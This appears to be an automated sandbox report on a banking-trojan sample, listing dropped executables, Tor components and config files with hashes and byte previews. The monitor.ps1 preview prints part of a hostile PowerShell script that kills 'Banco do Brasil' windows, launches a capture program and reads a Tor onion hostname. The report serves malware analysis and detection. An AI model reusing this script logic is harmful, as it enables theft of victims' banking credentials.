                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..|............... ........@.. ....................................`.................................D...O.......................................8............................................ ............... ..H............text....{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B................x.......H......../..........6...hN..PL..........................................6.(.....(....*6.{....o....&*B.{....-...o....*6.{.....o....*6.{.....o....*6.{.....o....*6.{.....o....*....0...........{....o......{....o........o.....3....o....o....r...p(....,;.{....r...po.....{....( ...o!....{....#.......?s"...o#......o.....3....($...,;.{....r...po%....{....( ...o!....{....#.......?s"...o#......,...s....o&.....}.....('...*j.{....#........s"...o#...*j.{....#........s"...o#...*.0..$.......
                                                C:\JQHPQS\QRROJT.exe.config (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.986033023891149
                                                Encrypted:false
                                                SSDEEP:3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRGOGFvREBAW4QIT:JiMVBdTMkIGMfVJ7VJdfEyFRzSJuAW4p
                                                MD5:9DBAD5517B46F41DBB0D8780B20AB87E
                                                SHA1:EF6AEF0B1EA5D01B6E088A8BF2F429773C04BA5E
                                                SHA-256:47E5A0F101AF4151D7F13D2D6BFA9B847D5B5E4A98D1F4674B7C015772746CDF
                                                SHA-512:43825F5C26C54E1FC5BFFCCE30CAAD1449A28C0C9A9432E9CE17D255F8BF6057C1A1002D9471E5B654AB1DE08FB6EABF96302CDB3E0FB4B63BA0FF186E903BE8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />.. </startup>..</configuration>
                                                C:\JQHPQS\capturador.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):6.5790668137555635
                                                Encrypted:false
                                                SSDEEP:384:SLGDDCVC75uC3KBLvc1+YPL2jyKvDZOzkcchbWKWXnIaBxopdhxrZNar6xrZNnDH:Z7wFvDckvhQXIVLzar8nDpNbQGB4/BG
                                                MD5:53FC515F425A2CDC9DADF1E139BC142B
                                                SHA1:B63CA1ABAB256B1619DA7DF994497E9F063F6713
                                                SHA-256:DABA783C0B0E47CE3096CA6661E785467B5EB45147DD29C09B77C6B18B7A3D7E
                                                SHA-512:FD91F97825A19C105A1304BC969CEEC33AF89614AA4CAC3C6BF75F3362CCB41C167431493BEBE8CA428FBA587E8089B9EAB7473148009AD9F8DE1A95093C3B1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..|............... ........@.. ....................................`.................................D...O.......................................8............................................ ............... ..H............text....{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B................x.......H......../..........6...hN..PL..........................................6.(.....(....*6.{....o....&*B.{....-...o....*6.{.....o....*6.{.....o....*6.{.....o....*6.{.....o....*....0...........{....o......{....o........o.....3....o....o....r...p(....,;.{....r...po.....{....( ...o!....{....#.......?s"...o#......o.....3....($...,;.{....r...po%....{....( ...o!....{....#.......?s"...o#......,...s....o&.....}.....('...*j.{....#........s"...o#...*j.{....#........s"...o#...*.0..$.......
                                                C:\JQHPQS\capturador.exe.config
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.986033023891149
                                                Encrypted:false
                                                SSDEEP:3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRGOGFvREBAW4QIT:JiMVBdTMkIGMfVJ7VJdfEyFRzSJuAW4p
                                                MD5:9DBAD5517B46F41DBB0D8780B20AB87E
                                                SHA1:EF6AEF0B1EA5D01B6E088A8BF2F429773C04BA5E
                                                SHA-256:47E5A0F101AF4151D7F13D2D6BFA9B847D5B5E4A98D1F4674B7C015772746CDF
                                                SHA-512:43825F5C26C54E1FC5BFFCCE30CAAD1449A28C0C9A9432E9CE17D255F8BF6057C1A1002D9471E5B654AB1DE08FB6EABF96302CDB3E0FB4B63BA0FF186E903BE8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />.. </startup>..</configuration>
                                                C:\JQHPQS\libcrypto-1_1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):3651526
                                                Entropy (8bit):6.466199643222916
                                                Encrypted:false
                                                SSDEEP:98304:ySBPSXl6cx2yHPp8Bdao0sBIN0iIW9fK4ufzG1Z9Jp/K1CPwDv3uFfJOfjT5YLzc:Bk16cx2yHPp8Bdao0s++ib9fK4uLG1Z4
                                                MD5:3406F79392C47A72BED2F0067B3CE466
                                                SHA1:A8E2940D61FC840441C4E2A835959D197929FFDF
                                                SHA-256:E4B6B2CA32B1E2BA26959EC7380C4F117418D3A724F60494FF3CB81505FBF43D
                                                SHA-512:930D794AA8715DCD23FAFBEAD7FE2EC95D2863783B4C52279870CAD93D5B6CF02BA8A13E2653D2BF731E9882BF63F43A7E44788CE47505346BE3FE8E8B872FA4
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t..pW.....!...#.....p&..B................@k.........................P/.....+.8...@... .......................#.......%...... &......................0&.<.............................".....................D.%..............................text...............................`..`.data...............................@.`..rdata...P... ...R... ..............@.`@.bss.....A....#.......................`..edata........#......r#.............@.0@.idata........%......t%.............@.0..CRT....,.....&.......%.............@.0..tls..........&.......%.............@.0..rsrc........ &.......%.............@.0..reloc..<....0&.......%.............@.0B/4........... '.......&.............@.@B/19..........0'.......&.............@..B/31.....\V...@,..X....+.............@..B/45...........,.......+.............@..B/57.....\.....-.......,.............@.0B/70...........-.......,.
                                                C:\JQHPQS\libevent-2-1-7.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1144039
                                                Entropy (8bit):6.2640955652625285
                                                Encrypted:false
                                                SSDEEP:24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
                                                MD5:A3BF8E33948D94D490D4613441685EEE
                                                SHA1:75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
                                                SHA-256:91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                                                SHA-512:C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#...........................h.................................B....@... ..........................Y......4............................P..X&..........................dj......................L................................text...............................`.P`.data...............................@.`..rdata..P...........................@.`@.bss..................................`..edata...Y.......Z...p..............@.0@.idata..4...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..X&...P...(..................@.0B/4..................................@.@B/19.....;".......$..................@..B/31......Y.......Z...4..............@..B/45.......... ......................@..B/57..................z..............@.0B/70.....(....0......................@..B/81.....H]...@...^......
                                                C:\JQHPQS\libevent_core-2-1-7.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):975436
                                                Entropy (8bit):6.216593168771383
                                                Encrypted:false
                                                SSDEEP:24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
                                                MD5:686C6A9DA6767287BF2E2126574FAFEA
                                                SHA1:2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
                                                SHA-256:ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
                                                SHA-512:3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........-......!...#.J...................`....0n................................F.....@... .........................i<...0...............................`..............................$........................2..H............................text...TI.......J..................`.P`.data........`.......P..............@.`..rdata..<V...p...X...T..............@.`@.bss..................................`..edata..i<.......>..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B/4..................................@.@B/19.................................@..B/31.....}W.......X...8..............@..B/45.....p...........................@..B/57..................z..............@.0B/70.......... ......................@..B/81......[...0...\......
                                                C:\JQHPQS\libevent_extra-2-1-7.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):683256
                                                Entropy (8bit):6.173131714749706
                                                Encrypted:false
                                                SSDEEP:12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
                                                MD5:070F988B98E9717BBD5E870A4F8C1611
                                                SHA1:17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
                                                SHA-256:9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
                                                SHA-512:C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#.$...................@.....d......................................@... .................................$...............................P...........................D~.......................................................text...$".......$..................`.P`.data...4....@.......*..............@.`..rdata..\A...P...B...,..............@.`@.bss.... .............................`..edata........... ...n..............@.0@.idata..$...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..P...........................@.0B/4......P....0......................@.@B/19.....0+...@...,..................@..B/31.....z?...p...@..................@..B/45..................0..............@..B/57.....t....`......................@.0B/70.................................@..B/81.....D...............
                                                C:\JQHPQS\libgcc_s_sjlj-1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1095418
                                                Entropy (8bit):6.031576353424405
                                                Encrypted:false
                                                SSDEEP:12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
                                                MD5:BD40FF3D0CE8D338A1FE4501CD8E9A09
                                                SHA1:3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
                                                SHA-256:EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
                                                SHA-512:404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!...#.:...j...............P.....m.........................@............@... .................................................................d............................f......................................................text....8.......:..................`.P`.data...(....P.......@..............@.0..rdata.......`.......B..............@.`@.bss..................................0..edata...............T..............@.0@.idata...............`..............@.0..CRT....,............f..............@.0..tls.................h..............@.0..reloc..d............j..............@.0B/4......H............p..............@.@B/19.....t...........................@..B/31.....a............,..............@..B/45......g...p...h..................@..B/57.....\).......*...Z..............@.0B/70.................................@..B/81.....=....0..........
                                                C:\JQHPQS\libssl-1_1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1106247
                                                Entropy (8bit):6.189020449469006
                                                Encrypted:false
                                                SSDEEP:24576:mGCAHhCGlXKtc/LuaO88CJcpi9OTXu1UYaBQfPlawVzmkmNXtyRi0H4Ine3/Z0OX:ZCA5DuaOWJUu1UYaBQfPQwVzmkmNXtyk
                                                MD5:9E3D55FBF890C6CBFFD836F2AEF4BA31
                                                SHA1:715890BA3BDA3431470CCA4F4BC492C0F63FA138
                                                SHA-256:E6F4CF41373E8770C670CF5E85461F25385314ED9D8A2B37381BC84F5C0DD5C0
                                                SHA-512:9848F28FD96C21DD054CBF3E722E56373696C1F7803C137AFC7C7203325D9738FA6B984D95CD49FF78A6D95C8F9406F869AF3C3783901DA3CC003E2B09497D65
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........G......!...#..................... .....j.........................`...........@... .........................3@......|>...0.......................@...C...........................L.......................................................text...d...........................`.P`.data....,... ......................@.`..rdata.......P.......:..............@.`@.bss....X....p........................`..edata..3@.......B...V..............@.0@.idata..|>.......@..................@.0..CRT....,...........................@.0..tls......... ......................@.0..rsrc........0......................@.0..reloc...C...@...D..................@.0B/4...................$..............@.@B/19.............. ...(..............@..B/31......7.......8...H..............@..B/45.................................@..B/57.................................@.0B/70.....................
                                                C:\JQHPQS\libssp-0.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):252871
                                                Entropy (8bit):5.911389655551474
                                                Encrypted:false
                                                SSDEEP:6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
                                                MD5:B77328DA7CEAD5F4623748A70727860D
                                                SHA1:13B33722C55CCA14025B90060E3227DB57BF5327
                                                SHA-256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
                                                SHA-512:2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z.........!...#.....2...............0.....h.........................@......q.....@... ......................`..i....p...............................................................@.......................p...............................text...............................`.P`.data...$....0......."..............@.0..rdata..h....@.......$..............@.0@.bss....d....P........................0..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.................4..............@.0..reloc...............6..............@.0B/4...................8..............@.@B/19..................<..............@..B/31.................................@..B/45......'.......(...0..............@..B/57..................X..............@.0B/70..................`..............@..B/81..................d..
                                                C:\JQHPQS\libwinpthread-1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):525113
                                                Entropy (8bit):6.099620174174238
                                                Encrypted:false
                                                SSDEEP:12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
                                                MD5:19D7CC4377F3C09D97C6DA06FBABC7DC
                                                SHA1:3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
                                                SHA-256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
                                                SHA-512:23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X..W......!...#.....6.....................d.................................)....@... ...................................... ..P....................0......................................................t...8............................text.............................. .P`.data...H...........................@.0..rdata..4...........................@.0@.bss..................................0..edata..............................@.0@.idata..............................@.0..CRT....0...........................@.0..tls................................@.0..rsrc...P.... ......................@.0..reloc.......0......................@.0B/4...........@......................@.@B/19.....$....P......................@..B/31.....|D...@...F..................@..B/45.................................@..B/57.....$0...0...2..................@.0B/70..........p..........
                                                C:\JQHPQS\monitor.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1688
                                                Entropy (8bit):5.279662107471557
                                                Encrypted:false
                                                SSDEEP:48:Dxc+6tOtDN95xLoXU8+IDp9frUr4KS692MEX+uCZGYiRIiGLaDr+:DxdpN34VSNsiZGY9yX+
                                                MD5:DD2C9A2529B9DB000E30FE0331F6FFAA
                                                SHA1:B7B89DC1E05479D421153EF5109DC72319C3943E
                                                SHA-256:EEF8C513B78DBE60D5FD2793052F7B29151B96D53A513BF6F2A27AB205A64B14
                                                SHA-512:E359DF6B0B7774E32522BF66932E4DD9561A5CBEA9F982369AB52FB1D51A4B7AD4AD5BAE6747717E126B6B14AB0018AA88B7EFB105E37CA6BCBDE140F60140F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Add-Type -AssemblyName System.Web....$capturerFileName = $args[0]....$domain = $args[1]....Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -Force............#............if (!($capturerProcess -eq $null)) {.......Stop-Process -Id $capturerProcess.Id -Force......}............#............$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru...........break.....}....}.......Start-Sleep -Milliseconds 100...}..}....#....$dataPath = "data"..$data = ""....For (;$data -eq "";) {....if (Test-Path -Path $dataPath) {....$data = Get-Content -Path $dataPath...}......Start-Sleep -Milliseconds 100..}....#....$onionHostPath = "$($env:ProgramData)\hscore\hostname"..$onionHost
                                                C:\JQHPQS\tor-gencert.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):1055232
                                                Entropy (8bit):6.432409650276543
                                                Encrypted:false
                                                SSDEEP:12288:EPmsFdKwDufqHtWxf9d+UDlh3CUrvVX7:cYwDufqHtWlXvlh35VL
                                                MD5:86585D1FEFE502AF61CC1AC83502D73D
                                                SHA1:92F5EA6539EDC25B7A43E5E62967941670F1CFD0
                                                SHA-256:7332B6E43206F54085B1CA61D6B8920E11E0F94D2AC82BBCBD852F378D703A77
                                                SHA-512:8EA093BFF34E768D33196441EA25A7EABAE9E0CA1DEF49EDDB018D8803D55D326D2624FCF9018225162720F8DDC97FE32E39F5AED711978BD46B3EC364B96154
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..........................`...........@... .............................................................. ..4>..........................dh..........................4............................text...............................`.P`.data...(...........................@.`..rdata...M.......N...j..............@.`@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..4>... ...@..................@.0B................................................................................................................................................................................................................................................................................................................
                                                C:\JQHPQS\tor.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):4229632
                                                Entropy (8bit):6.445770642858094
                                                Encrypted:false
                                                SSDEEP:98304:nQcSbHtBsdxf/78Xd1U7hFndQI7yPr5L9E:QXHtBsPj8XdwndQIm
                                                MD5:67AB12CF6CABC14588E4F51B21C2134A
                                                SHA1:32A4FF564F38BF4B62007E419F19C991E60D6E14
                                                SHA-256:F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BA
                                                SHA-512:2A1C67E9D23D6B050E35C5A8E159309CF598095239406C60A9F721FDDC912E21AFAB7036CBD9F77197CC4241DF5F8FA6AA9D7294762659178C6EDEB4699D5BEC
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................0...@..^............0...@..........................0A.....|9A...@... ...............................>..5...........................0?.0............................?;.....................,.>.(............................text...$.0.......0.................`.P`.data........0.......0.............@.`..rdata.......`1......L1.............@.`@.bss.....]...p>.......................`..idata...5....>..6...\>.............@.0..CRT....4.....?.......>.............@.0..tls......... ?.......>.............@.0..reloc..0....0?.......>.............@.0B................................................................................................................................................................................................................................................................................................................
                                                C:\JQHPQS\zlib1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):124416
                                                Entropy (8bit):6.479923939252401
                                                Encrypted:false
                                                SSDEEP:3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
                                                MD5:6F98DA9E33CD6F3DD60950413D3638AC
                                                SHA1:E630BDF8CEBC165AA81464FF20C1D55272D05675
                                                SHA-256:219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
                                                SHA-512:2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...#.r.........................c.........................`.......3....@... .........................|............@.......................P..............................d.......................@................................text...tp.......r..................`.P`.data...H............v..............@.0..rdata...O.......P...x..............@.`@.bss..................................`..edata..|...........................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.........0......................@.0..rsrc........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                C:\ProgramData\7a260420
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:y:y
                                                MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ..
                                                C:\ProgramData\Leitor\capturador.exe
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):6.5790668137555635
                                                Encrypted:false
                                                SSDEEP:384:SLGDDCVC75uC3KBLvc1+YPL2jyKvDZOzkcchbWKWXnIaBxopdhxrZNar6xrZNnDH:Z7wFvDckvhQXIVLzar8nDpNbQGB4/BG
                                                MD5:53FC515F425A2CDC9DADF1E139BC142B
                                                SHA1:B63CA1ABAB256B1619DA7DF994497E9F063F6713
                                                SHA-256:DABA783C0B0E47CE3096CA6661E785467B5EB45147DD29C09B77C6B18B7A3D7E
                                                SHA-512:FD91F97825A19C105A1304BC969CEEC33AF89614AA4CAC3C6BF75F3362CCB41C167431493BEBE8CA428FBA587E8089B9EAB7473148009AD9F8DE1A95093C3B1D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..|............... ........@.. ....................................`.................................D...O.......................................8............................................ ............... ..H............text....{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B................x.......H......../..........6...hN..PL..........................................6.(.....(....*6.{....o....&*B.{....-...o....*6.{.....o....*6.{.....o....*6.{.....o....*6.{.....o....*....0...........{....o......{....o........o.....3....o....o....r...p(....,;.{....r...po.....{....( ...o!....{....#.......?s"...o#......o.....3....($...,;.{....r...po%....{....( ...o!....{....#.......?s"...o#......,...s....o&.....}.....('...*j.{....#........s"...o#...*j.{....#........s"...o#...*.0..$.......
                                                C:\ProgramData\Leitor\capturador.exe.config
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.986033023891149
                                                Encrypted:false
                                                SSDEEP:3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRGOGFvREBAW4QIT:JiMVBdTMkIGMfVJ7VJdfEyFRzSJuAW4p
                                                MD5:9DBAD5517B46F41DBB0D8780B20AB87E
                                                SHA1:EF6AEF0B1EA5D01B6E088A8BF2F429773C04BA5E
                                                SHA-256:47E5A0F101AF4151D7F13D2D6BFA9B847D5B5E4A98D1F4674B7C015772746CDF
                                                SHA-512:43825F5C26C54E1FC5BFFCCE30CAAD1449A28C0C9A9432E9CE17D255F8BF6057C1A1002D9471E5B654AB1DE08FB6EABF96302CDB3E0FB4B63BA0FF186E903BE8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />.. </startup>..</configuration>
                                                C:\ProgramData\Leitor\libcrypto-1_1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):3651526
                                                Entropy (8bit):6.466199643222916
                                                Encrypted:false
                                                SSDEEP:98304:ySBPSXl6cx2yHPp8Bdao0sBIN0iIW9fK4ufzG1Z9Jp/K1CPwDv3uFfJOfjT5YLzc:Bk16cx2yHPp8Bdao0s++ib9fK4uLG1Z4
                                                MD5:3406F79392C47A72BED2F0067B3CE466
                                                SHA1:A8E2940D61FC840441C4E2A835959D197929FFDF
                                                SHA-256:E4B6B2CA32B1E2BA26959EC7380C4F117418D3A724F60494FF3CB81505FBF43D
                                                SHA-512:930D794AA8715DCD23FAFBEAD7FE2EC95D2863783B4C52279870CAD93D5B6CF02BA8A13E2653D2BF731E9882BF63F43A7E44788CE47505346BE3FE8E8B872FA4
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t..pW.....!...#.....p&..B................@k.........................P/.....+.8...@... .......................#.......%...... &......................0&.<.............................".....................D.%..............................text...............................`..`.data...............................@.`..rdata...P... ...R... ..............@.`@.bss.....A....#.......................`..edata........#......r#.............@.0@.idata........%......t%.............@.0..CRT....,.....&.......%.............@.0..tls..........&.......%.............@.0..rsrc........ &.......%.............@.0..reloc..<....0&.......%.............@.0B/4........... '.......&.............@.@B/19..........0'.......&.............@..B/31.....\V...@,..X....+.............@..B/45...........,.......+.............@..B/57.....\.....-.......,.............@.0B/70...........-.......,.
                                                C:\ProgramData\Leitor\libevent-2-1-7.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1144039
                                                Entropy (8bit):6.2640955652625285
                                                Encrypted:false
                                                SSDEEP:24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
                                                MD5:A3BF8E33948D94D490D4613441685EEE
                                                SHA1:75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
                                                SHA-256:91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                                                SHA-512:C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
                                                Malicious:false
                                                Reputation:unknown
